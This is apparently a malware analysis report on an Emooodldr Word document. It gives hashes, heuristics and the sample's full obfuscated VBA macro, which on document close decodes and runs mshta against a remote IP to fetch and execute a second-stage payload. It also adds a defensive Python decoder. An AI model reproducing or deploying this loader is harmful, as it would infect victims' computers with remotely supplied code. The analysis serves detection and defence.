Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 d156e14065b5293a…

MALICIOUS

Office (OOXML)

Size: 54.1 KB · Created: 2017-11-29 23:43:00 UTC · Authoring application: Microsoft Office Word 16.0000 · First seen: 2019-03-18
MD5: acdb52ba10e89aec5fe717f428636875
SHA-1: df4bec2c8db28c8d5a9892c9b716825bb82ce467
SHA-256: d156e14065b5293a5511a027e6943399b3450a6b3ff74c50e31b3b7f4a1153f1
Risk score: 322

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1218.005 System Binary Proxy Execution: Mshta (the command line decoded from the macro invokes mshta)

The sample carries a heavily obfuscated VBA project whose entry point is an AutoClose procedure (Word runs it when the document is closed, a common loader trick that delays execution until the lure has been read). AutoClose does not hold the payload itself; it calls Application.Run "fominha", so the dangerous procedure is reached only through a string. fominha rebuilds two strings with chains of Replace() calls that swap 12-character junk tokens for single characters, padded with dead arithmetic and Trim()/concatenation assignments that are never read. Walking the Replace chains in source order yields the ProgID WScript.Shell and the command line mshta http://198.55.107.156/omm/stem.php?utma=honda, which CreateObject(nirvana).Run cogumelo, 0 executes with a hidden window. mshta then fetches and runs whatever script the server returns, so the second stage never touches the document on disk. ClamAV independently flags the file as Doc.Malware.Emooodldr-6711604-0.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. This sample uses the junk-token Replace variant: both the ProgID (WScript.Shell) and the command line (mshta plus URL) are assembled at run time, so a plain string search of the module finds neither "WScript.Shell" nor "mshta". The IP address 198.55.107.156 is, however, left in clear text inside the encoded string, so it is still greppable.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Sub AutoClose() runs when the document is closed. Here it contains only junk assignments plus Application.Run "fominha", which hands control to the decoder procedure by name.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject(nirvana).Run cogumelo, 0: the ProgID argument is a variable decoded at run time (WScript.Shell), and the second argument to Run, 0, hides the spawned window.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 15 URLs below were found in document text (OOXML body / shared strings). They are the XML namespace declarations Word writes into the package parts (document.xml and friends), not network indicators; the only network indicator in this sample is the IP address decoded from the macro.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2543 bytes
SHA-256: f290efbc56b555a7db591e411cf4821f61765270077273e4ad923c88ed220189
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub fominha()
 BvizgwnFJEVL = 1025 - 1590 - 1635 - 526 - 1819 - 756 - 1765
yRpJONvq = Trim("p") & Trim("I") & "k"
WVLgBwJxEDk = 370 + 238 + 70
fkWiuqnMVjSz = 1215 + 673 + 137 + 1819 + 1867
oiVKZIzPndn = "N" & Trim("S") & "R"

 cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
uPrnHBVNN = 1146 + 1067
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
GfXuZGUWW = "w" & Trim("A")
pEfYMkCVMDBK = 1029 + 1651 + 643 + 1997 + 894 + 1199 + 969
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
UHYdwIq = "d" & Trim("K") & Trim("Y")
iBAnroMgq = "Z" & "Q" & Trim("M")
cogumelo = Replace(cogumelo, "KySNYTJRAjKR", "l")

nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "iJbwOEbXXDUY", "m")
nirvana = Replace(nirvana, "DuQkRQgnNogf", "a")
GFdjonOvvN = 1229 + 1997 + 767 + 1345
wdkWwVMogMdF = Trim("C") & Trim("o") & Trim("d")
WDuCSTJ = 519 - 1951 - 448 - 315 - 1544 - 1316 - 1496
nirvana = Replace(nirvana, "VfnwvorYrOGq", "s")
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
XooBBDiuw = "f" & "H" & Trim("D") & "A"
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
yBjcuoUUR = "i" & "c" & "q" & "M" & "i"
YFnIKVUDWo = 1743 + 996 + 1927 + 622 + 106 + 1839


 CreateObject(nirvana).Run cogumelo, 0
 YWBYKNnG = 1482 + 1928
iScvAfJ = "S" & "M" & "V"
iJWIpyRIvEo = 1085 + 821 + 1310 + 357
poSXLkHfzF = 1956 - 1587 - 1002 - 1256
UivKyIW = 1591 + 174 + 366 + 940 + 1106

End Sub

Sub AutoClose()

  Xwzcvbkqgd = 1905 + 604 + 1197 + 113 + 469 + 1571 + 409
UArEdXocXAp = 1210 - 359
gRINSrwkzQH = Trim("R") & "T" & Trim("N") & Trim("i")
ZQQNViIRP = 1605 - 387 - 894 - 88
YiYrBorUWXo = 40 - 1342 - 1003 - 1795 - 930

  Application.Run "fominha"
  gAJMQHJn = 1568 + 1554 + 1690 + 1220
DQXDnWzd = 521 + 394 + 1937
PJqGHnKyW = "W" & "Z"
GxCxAKVQO = Trim("A") & Trim("Y")

End Sub
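Decoding the two Replace chains by hand is error-prone: the junk tokens are 12 characters long, several of them ("KySNYTJRAjKR", "iJbwOEbXXDUY", ...) never occur in the string they are supposedly removed from, and the order of the Replace() calls matters. The following Python is an added example written for this page, not part of the analyser output or of the oletools project. It walks the macro top to bottom, keeps only plain string assignments and Replace() calls, applies them in source order (VBA Replace is case-sensitive by default and replaces every occurrence, which str.replace matches), then resolves the CreateObject(...).Run sink and the AutoClose to Application.Run trigger chain. The input is the relevant lines copied from macros.bas above, with some junk assignments kept to show they are ignored; the function and regex names are mine. It generalises beyond this sample to any variable names and any number of Replace() steps, which a one-shot regex strip of the tokens would not, since an early substitution can create a token that a later Replace() consumes.

```python
import re

# Lines copied from the macros.bas preview on this page. The dead arithmetic
# and Trim()/concatenation noise is kept so the emulator is seen to skip it;
# the tokens that never occur ("KySNYTJRAjKR", "iJbwOEbXXDUY") are decoys,
# since Replace() of an absent token is a no-op.
MACRO_SRC = r'''
Sub fominha()
 BvizgwnFJEVL = 1025 - 1590 - 1635 - 526 - 1819 - 756 - 1765
yRpJONvq = Trim("p") & Trim("I") & "k"
 cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
uPrnHBVNN = 1146 + 1067
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
cogumelo = Replace(cogumelo, "KySNYTJRAjKR", "l")
nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "iJbwOEbXXDUY", "m")
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
iScvAfJ = "S" & "M" & "V"
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
 CreateObject(nirvana).Run cogumelo, 0
End Sub

Sub AutoClose()
  Application.Run "fominha"
End Sub
'''

# var = "literal"   (a lone string literal; VBA doubles quotes inside strings)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
# var = Replace(var, "token", "replacement")
REPLACE_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Replace\(\s*(\w+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*$')
# CreateObject(objVar).Run cmdVar ...
SINK_RE = re.compile(r'CreateObject\((\w+)\)\.Run\s+(\w+)')
# Word/Excel auto-execution entry points (names the host runs on its own)
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(Auto_?Open|Auto_?Close|Auto_?Exec|Auto_?New|Document_Open|'
    r'Document_Close|Document_New|Workbook_Open)\s*\(', re.I | re.M)
APPRUN_RE = re.compile(r'Application\.Run\s+"(\w+)"')


def emulate_replace_chain(src):
    """Track string variables and apply Replace() calls in source order.
    Everything else (arithmetic, Trim() noise) is ignored. Returns {var: value}."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = m.group(2).replace('""', '"')
            continue
        m = REPLACE_RE.match(line)
        if m:
            dst, srcvar, token, repl = m.groups()
            if srcvar in env:                     # str.replace == VBA Replace
                env[dst] = env[srcvar].replace(token, repl)
    return env


def recover_sink(src):
    """Resolve CreateObject(x).Run y to (decoded ProgID, decoded command line)."""
    env = emulate_replace_chain(src)
    m = SINK_RE.search(src)
    if not m:
        return None
    obj_var, cmd_var = m.groups()
    return env.get(obj_var), env.get(cmd_var)


def trigger_chain(src):
    """Return (auto-exec entry points, procedures reached via Application.Run),
    which ties the sink back to the document-close event."""
    return AUTOEXEC_RE.findall(src), APPRUN_RE.findall(src)


def extract_iocs(command):
    """Split the recovered command line into the LOLBin and the URLs it carries."""
    binary = command.split(None, 1)[0].lower()
    urls = re.findall(r'https?://[^\s"\']+', command)
    return binary, urls


if __name__ == "__main__":
    obj, cmd = recover_sink(MACRO_SRC)
    print("trigger chain:", trigger_chain(MACRO_SRC))
    print("COM object   :", obj)
    print("command line :", cmd)
    print("IOCs         :", extract_iocs(cmd))
```

Running it yields WScript.Shell and the command line mshta http://198.55.107.156/omm/stem.php?utma=honda. The decoded command, not the literal IP in the source, is the thing to block and hunt for: WINWORD.EXE spawning mshta.exe with a URL argument is the process-tree signature of this loader, and the second Replace chain shows why the ProgID must be recovered dynamically rather than grepped.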
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 12800 bytes
SHA-256: a15c453d2e422cd837a18ea051e457b3cd58e6808d0dcfebc78def3ae71c547d
Detection: ClamAV Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely (this per-artifact verdict applies to the raw vbaProject.bin container; the macro source decoded from it is heavily obfuscated, as the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding above records)